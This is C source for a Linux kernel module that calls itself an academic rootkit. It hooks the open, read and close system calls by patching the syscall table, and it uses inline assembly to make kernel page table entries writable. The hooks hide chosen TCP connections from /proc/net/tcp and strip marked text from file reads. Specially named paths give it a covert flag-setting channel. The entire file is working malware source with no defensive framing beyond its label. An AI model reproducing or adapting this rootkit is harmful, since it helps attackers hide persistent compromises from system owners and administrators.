#include <linux/module.h>	/* Needed by all modules */
#include <linux/version.h>

#include <linux/kernel.h>	/* Needed for KERN_INFO */
#include <linux/init.h>		/* Needed for the macros */

#include <linux/fs.h>
#include <linux/dirent.h>
#include <linux/proc_fs.h>
#include <linux/types.h>
#include <linux/stat.h>
#include <linux/fcntl.h>
#include <linux/mm.h>
#include <linux/if.h>
#include <asm/types.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include <asm/segment.h>
#include <linux/types.h>
#include <asm/unistd.h>
#include <asm/string.h>

#include "rootkit.h"

#define RK_AUTHOR "Victor Ruben Lacort Pellicer <vicrula@alumni.uv.es>"
#define RK_DESC   "An Academical LKM Rootkit"

unsigned long **lkm_call_table;

unsigned char rk_flags = 0x03;

asmlinkage int (*old_read)(unsigned int,char *,unsigned int);
asmlinkage int (*old_open)(const char *,int,int);
asmlinkage int (*old_close)(unsigned int);

int netds[50];

asmlinkage int new_open(const char *filename,int flags,int mode){
 int r,hm,t;
 char *kstr;

	hm=strlen(filename);

        kstr=(char*)kmalloc(hm+1,GFP_KERNEL);
	memset(kstr,0,hm+1);
	if(kstr==NULL){
		r=old_open(filename,flags,mode);
		return r;
	}
        memset(kstr,0,hm);
        copy_from_user(kstr,filename,hm);

	if (!strcmp(kstr,"/rk_flag/in"))
	{
		rk_flags = flags;
		printk("\FLAG IN: %x", rk_flags);
		return 0;
	}

	if (!strcmp(kstr,"/rk_flag/out"))
	{
		printk("\nFLAG OUT: %x", rk_flags);
		return rk_flags;
	}

	r=old_open(filename,flags,mode);
        if((r<3)||(hm>30))return r;

	if(!strcmp(kstr,"/proc/net/tcp")){
		for(t=0;t<50;t++){
			if(!netds[t])break;
		}
		if(t==50)
		{
			kfree(kstr);
			return r;
		}
		netds[t]=r;
	}
	kfree(kstr);
	return r;
}

asmlinkage int new_close(unsigned int fd){
 int t;
	for(t=0;t<50;t++){
		if(netds[t]==fd){
			netds[t]=0;
			break;
		}
	}
	return old_close(fd);
}

asmlinkage int new_read(unsigned int fd,char *buf,unsigned int count){
char *kbuf,*kbuf2,*cp,*tp,*tp2,ch;
int t,r,rr,hb,hmp;

	r=old_read(fd,buf,count);
	if ( (rk_flags & 0x01) || (rk_flags & 0x02) )
	{
		if(r<0)return r;
		if(r>20000)return r;
		kbuf=(char*)kmalloc(r+1,GFP_KERNEL);
		kbuf2=(char*)kmalloc(r+1,GFP_KERNEL);
		memset(kbuf,0,r+1);
		memset(kbuf2,0,r+1);

		if((kbuf==NULL)||(kbuf2==NULL))return r;
		copy_from_user(kbuf,buf,r);
		for(t=0;t<50;t++){
			if(netds[t]==fd){
				break;
			}
		}
	       if ( ((t<50)&&(fd>2)) && (rk_flags & 0x01) ) {

		for(t=0,hb=0,hmp=0,cp=kbuf2,rr=r;t<r;t++){
			if(strstr(((char*)(kbuf+t))," 0:")==((char*)(kbuf+t)))hb=1;
			if(hb){
			    tp=strstr(((char*)(kbuf+t)),":");
			    if(tp){
				tp2=strstr(tp+1,":");
				if(tp2){
				        tp=strstr(tp2+1,":");
					if(strstr(++tp2,LOCALHIDE)==tp2){
						do{
							rr--;
							t++;
						}while((*((char*)(kbuf+t))!='\n')&&(t<r));	
						if(t>=r)goto uez;
						t++;
						rr--;
						hb=2;
					}
				}	
			    }	
			    if(hb==2)hb=1;
			     else hb=0;
			}

		      if(*((char*)(kbuf+t))==':')hmp++;
		      if((hmp==5)&&(*((char*)(kbuf+t))=='\n')){
			hmp=0;
			hb=1;
		      }
	  
		    *(cp++)=*((char*)(kbuf+t));
		}
	  
		}
		else if (rk_flags & 0x02)
			{
			for(t=0,cp=kbuf2,rr=r;t<r;t++){
				ch=*((char*)(kbuf+t+strlen(SECRETLINE))+1);
				*((char*)(kbuf+t+strlen(SECRETLINE))+1)='\0';
				if(strstr((char*)(kbuf+t),SECRETLINE)==(char*)(kbuf+t)){
					do{
					        *((char*)(kbuf+t+strlen(SECRETLINE))+1)=ch;
						t++;
						rr--;
						if(t>=r)goto uez;	
						ch=*((char*)(kbuf+t+strlen(SECRETLINE))+1);
						*((char*)(kbuf+t+strlen(SECRETLINE))+1)='\0';
					}while(strstr((char*)(kbuf+t),SECRETLINE)!=(char*)(kbuf+t));
					*((char*)(kbuf+t+strlen(SECRETLINE))+1)=ch;
					t+=strlen(SECRETLINE);rr-=strlen(SECRETLINE);
				}
				else *((char*)(kbuf+t+strlen(SECRETLINE))+1)=ch;

				*(cp++)=*((char*)(kbuf+t));
			}


		uez:;
		       }

		copy_to_user(buf,kbuf2,rr);

		kfree(kbuf);kfree(kbuf2);

		return r;
	}
	else return r;
}

unsigned long **find_sys_call_table(void)
{
	return SYSCALL_TABLE;	//from /proc/kallsyms
}

void *origaddr = (void*)0;
void *origcr3  = (void*)0;
void *direntry = (void*)0;
void *mdentry  = (void*)0;

void addr_trans(void)
{
	__asm__ __volatile__
	(
	 	"pushl	%eax\n\t"
	       	"pushl	%ebx\n\t"
		"movl	%cr3, %eax\n\t"
		"movl	%eax, origcr3\n\t"
		"andl	$0xfffff000, %eax\n\t"
		"addl	$0xc0000000, %eax\n\t"
		"movl	origaddr, %ebx\n\t"
		"shrl	$22, %ebx\n\t"
		"sall	$2, %ebx\n\t"
		"addl	%ebx, %eax\n\t"
		"movl	(%eax), %eax\n\t"
		"movl	%eax, direntry\n\t"
		"andl	$0xfffff000, %eax\n\t"
		"addl	$0xc0000000, %eax\n\t"
		"movl	origaddr, %ebx\n\t"
		"andl	$0x003ff000, %ebx\n\t"
		"shrl	$12, %ebx\n\t"
		"sall	$2, %ebx\n\t"
		"addl	%ebx, %eax\n\t"
		"movl	%eax, %ebx\n\t"
		"movl	(%eax), %eax\n\t"
		"andl	$0xfffff000, %eax\n\t"
		"addl	$0x67, %eax\n\t"
		"movl	%eax, (%ebx)\n\t"
		"movl	%eax, mdentry\n\t"
		"popl	%ebx\n\t"
		"popl	%eax\n\t"	
	);
}


static int __init init_rk_module(void)
{
	int t;

	for(t=0;t<50;t++) netds[t]=0;

	lkm_call_table = find_sys_call_table();
	
	old_open=	(void *) lkm_call_table[__NR_open];
	origaddr = &lkm_call_table[__NR_open];
	addr_trans();
	lkm_call_table[__NR_open]=	(void *) new_open;
	
	old_close=	(void *) lkm_call_table[__NR_close];
	origaddr = &lkm_call_table[__NR_close];
	addr_trans();
	lkm_call_table[__NR_close]=	(void *) new_close;

	old_read=	(void *) lkm_call_table[__NR_read];
	origaddr = &lkm_call_table[__NR_read];
	addr_trans();
	lkm_call_table[__NR_read]=	(void *) new_read;
	
	return 0;
}
static void __exit cleanup_rk_module(void)
{
        lkm_call_table[__NR_read]=	(void *) old_read;
        lkm_call_table[__NR_open]=	(void *) old_open;
        lkm_call_table[__NR_close]=	(void *) old_close;
}

module_init(init_rk_module);
module_exit(cleanup_rk_module);

MODULE_LICENSE("GPL");

MODULE_AUTHOR(RK_AUTHOR);	/* Who wrote this module? */
MODULE_DESCRIPTION(RK_DESC);	/* What does this module do */

